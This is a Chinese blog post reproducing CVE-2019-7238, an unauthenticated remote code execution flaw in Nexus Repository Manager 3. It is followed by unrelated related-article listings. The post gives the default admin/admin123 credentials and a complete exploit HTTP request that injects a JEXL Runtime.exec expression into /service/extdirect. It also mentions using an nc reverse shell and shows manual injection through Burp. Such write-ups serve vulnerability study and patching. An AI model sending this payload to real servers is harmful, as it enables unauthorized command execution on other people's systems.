Nexus Repository Manager 3(CVE-2019-7238) 远程代码执行漏洞复现

最新推荐文章于 2024-03-05 16:26:39 发布
最新推荐文章于 2024-03-05 16:26:39 发布
阅读量1.4k 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: web java 安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/114364319
版权

漏洞背景

Nexus Repository Manager 3是一款软件仓库,可以用来存储和分发Maven,NuGET等软件源仓库。其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在未授权访问漏洞,将可以导致任意命令执行漏洞。2019年2月5日Sonatype发布安全公告,在Nexus Repository Manager 3中由于存在访问控制措施的不足,未授权的用户可以利用该缺陷构造特定的请求在服务器上执行Java代码,从而达到远程代码执行的目的。

影响范围

Nexus Repository Manager OSS/Pro 3.6.2 版本到 3.14.0 版本

复现条件

  1. 未授权的访问
  2. 弱口令访问
  3. jar包上传

漏洞利用

nexus默认端口为8081,且存在未授权访问(3.15起关闭此功能),通过弱口令admin/admin123进入
在这里插入图片描述
需要上传jar包
但大佬说“真实环境则不需要,因为真实环境已经上传了assert
自己制作一个jar包

》》cat T1.java
》》public class T1 {
	public static void main(String[] args) {
	System.out.println("hello world");
	}
	}
》》javac T1.java
》》jar cvf T1.jar T1.class

在这里插入图片描述
在这里插入图片描述
上传之后便可以用PoC了

POST /service/extdirect HTTP/1.1
Host: IP:8081
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Content-Type: application/json
Content-Length: 308
Connection: close

{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":25,"filter":[{"property":"repositoryName","value":"*"},{"property":"expression","value":"''.class.forName('java.lang.Runtime').getRuntime().exec('calc.exe')"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":4}

将PoC放入Burpsuite,更改下IP,我这边直接用的nc反弹shell
在这里插入图片描述
在这里插入图片描述
当然也可以手工利用
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

将选项改为All Repositorles后点击Prevlew抓包

在这里插入图片描述

expressiontype的value处进行注入,即可达到与PoC同样的效果。

在这里插入图片描述

小 白 萝 卜
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
使用Nexus Repository Manager管理Nuget包
KEEP MOVING.
03-25 2980
目录一、安装Nexus二、使用案例 一、安装Nexus Nexus Repository Manager是什么 Nexus是一个存储库管理器。它使您能够代理,收集和管理依赖项,以免您不断处理一系列JAR。它使分发软件变得容易。在内部,您将构建配置为将构件发布到Nexus之后,它们便可供其他开发人员使用。您将获得拥有自己的“中心”所带来的好处,而且没有比这更容易的协作方式了 https://blog.sonatype.com/2010/04/why-nexus-for-the-non-programmer
CVE-2019-7238.py
10-25
# CVE-2019-7238 Nexus Repository Manager 3 Remote Code Execution without authentication [@voidfyoo](https://twitter.com/voidfyoo)
CVE-2019-7238CVE-2019-7238的Poc-Nexus Repository Manager 3远程执行代码
03-02
CVE-2019-7238 Rico腾讯安全云顶实验室和发现的Nexus Repository Manager 3经身份验证的远程代码执行< 详细分析(英文): 详细分析(非英语): 安全公告:
Nexus Repository Manager的使用
08-02
Nexus Repository Manager的使用Nexus Repository Manager的使用
Nexus Repository的搭建
最新发布
JAVA领域优质创作者,基于分片网络查询方法专利发明者。
03-05 1218
Nexus Repository用于管理maven的jar包。java开发程序员每天都在使用,但是自己搭建或者管理的就很少。除非你是系统架构师。因为这一套东西,基本是搭建一次就不需要人来搭建了,日后打开界面维护的机会也很少,我们只需要将开发的一些jar包发布的maven仓库。
漏洞情报 | Sonatype Nexus Repository Manager 目录遍历漏洞
爱国小白帽
06-24 1201
​ 点击上方 订阅话题 第一时间了解漏洞威胁 0x01 漏洞描述 Sonatype Nexus Repository Manager 是美国Sonatype公司的一款仓库管理器。 360漏洞云监测到 Sonatype Nexus Repository Manager 3.x 系列 3.31.0 之前的版本存在目录遍历漏洞CVE-2021-34553)。经认证的远程攻击者可在被授予访问权限的情况下获取blob文件清单,并通过构造一个GET请求读取blob文件内容,造成信息泄露。 0x02 危害等级 中
npm的nexus私服 E401 E500错误处理记录
宁静致远
07-16 1万+
nexus搭建的npm本地仓库,在发布时报 npmERR!codeE401,原因是没有基础权限,需要登录,用帐号登录时又报E500错误,从网上查了一下,资源比较少,而且基本重复,现把问题记录一下,以方便后期有相同问题的伙伴作参考 npm E401 npm publish时,错误详情如下: npm ERR! code E401 npm ERR! Unable to authenticate, need: BASIC realm="Sonatype Nexus Repository Manag...
maven在尝试访问nexus存储库时得到“授权” Not authorized , ReasonPhrase:Unauthorized
我的博客
05-09 3395
解决:maven配置文件setting.xml里server里ID必须匹配mirror的ID <servers> <server> <id>nexus-release</id> <---THIS MUST MATCH <username>USER_NAME</username> <password>USER_PASSWD</password> &l
idea使用nexus私服用户名密码地址配置正确,deploy的时候一直报status: 401 Unauthorized授权错误
qq_45671821的博客
04-18 1178
idea没有读取到自己配置的settings.xml文件,而是读取的idea自带的maven的配置文件,所以一直显示授权。设置user settings file 勾选右边的override。设置maven home path 设置成为自己的maven地址。让idea读取到自己改的那个settings.xml文件。设置成自己的settings.xml文件所在的地址。file->settings->搜索maven。
CVE-2019-7238复现
梦之序章的博客
04-13 5995
成因 Nexus Repository Manager是Sonatype公司的一个产品,简称NXRM,它是一款通用的软件包仓库管理服务,可以简单的理解为Maven的私服。 2019年2月5日Sonatype发布安全公告,在Nexus Repository Manager 3中由于存在访问控制措施的不足,授权的用户可以利用该缺陷构造特定的请求在服务器上执行Java代码,从而达到远程代码执行的目的。...
Npm 使用 Nexus 仓库的登录时候出现授权的问题
HONEY MOOSE
10-27 866
例如,我们在 npm 登录 Nexus 的仓库的时候提示错误如下: npm ERR!Npm 使用 Nexus 仓库的登录时候出现授权的问题 - 前端 - OSSEZ。上面的问题在于 Nexus 的 realm 配置。
Nexus Repository Manager 3 私服搭建
清水的专栏
09-24 1282
https://www.cnblogs.com/localit/p/5318497.html
nexus-3.37.0-01-win64 - Nexus Repository Manager OSS
12-12
Nexus Repository Manager OSS 由于nexus目前官网上(https://help.sonatype.com/repomanager3/download)已经很难下载了,除非翻墙,故整理了一下目前最新版本的分享一下,有需要的欢迎下载。
Nexus Repository Manager 3.28.1-01
10-26
最新版本的 Nexus Repository Manager 3.28.1-01 Nexus是一个强大的Maven仓库管理器,它极大地简化了本地内部仓库的维护和外部仓库的访问。 如果使用了公共的Maven仓库服务器,可以从Maven中央仓库下载所需要的构件...
Nexus Repository Manager OSS 2.14.21
02-22
Nexus Repository OSS is distributed with Sencha Ext ...Nexus Repository Manager 2 OSS is a repository manager which can be freely used and is distributed under the Eclipse Public License (EPL Version 1).
持续集成-Sonatype Nexus安装
weixin_34378922的博客
04-14 96
2019独角兽企业重金招聘Python工程师标准>>> ...
nexus3】 Sonatype Nexus: docker login 401 Unauthorized
流氓兔的博客
10-10 5949
nexus3】 Sonatype Nexus: docker login 401 Unauthorized一、命令登录nexus3报错二、可能原因 一、命令登录nexus3报错 命令: docker login -u admin -p password ip:5000 报错: Error response from daemon: login attempt to http://ip:5000/v2/ failed with status: 401 Unauthorized HTTP401错误代表用户没
nexus下载提示无权限
weixin_42555971的博客
07-09 1075
401
Maven私服仓库配置-Nexus详解
热门推荐
怪咖@的博客
05-28 1万+
Maven 私服是一种特殊的Maven远程仓库,它是架设在局域网内的仓库服务,用来代理位于外部的远程仓库(中央仓库、其他远程公共仓库)。当然也并不是说私服只能建立在局域网,也有很多公司会直接把私服部署到公网,具体还是得看公司业务的性质是否是保密的等等,因为局域网的话只能在公司用,部署到公网的话员工在家里也可以办公使用。
Sonatype Nexus Repository Manager 怎么执行docker pull
06-08
要在 Sonatype Nexus Repository Manager执行 Docker pull,您需要先创建一个 Docker 代理存储库来缓存 Docker 镜像。以下是执行 Docker pull 的步骤: 1. 登录 Sonatype Nexus Repository Manager 并导航到 "Repositories" 页面。 2. 点击 "Create Repository" 按钮并选择 "docker (proxy)" 选项。 3. 输入仓库的相关信息,包括名称、URL 和可选的认证信息。 4. 点击 "Create Repository" 按钮以创建 Docker 代理存储库。 5. 转到 Docker 主机上,并确保已安装 Docker 客户端。 6. 在命令行中输入 "docker login" 命令,并输入您的 Sonatype Nexus Repository Manager 凭据以登录。 7. 使用以下命令拉取 Docker 镜像: ``` docker pull <nexus-url>/<repository-name>/<image-name>:<tag> ``` 其中,"<nexus-url>" 是 Sonatype Nexus Repository Manager 的 URL,"<repository-name>" 是您创建的 Docker 代理存储库的名称,"<image-name>" 是要拉取的 Docker 镜像名称,"<tag>" 是要拉取的 Docker 镜像标签。 例如,以下命令将从名为 "docker-proxy" 的 Docker 代理存储库中拉取 "nginx" 镜像的 "latest" 标签: ``` docker pull http://<nexus-url>/repository/docker-proxy/nginx:latest ``` 请注意,如果您的 Sonatype Nexus Repository Manager 受到防火墙或代理的限制,则可能需要配置 Docker 客户端以使用代理。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值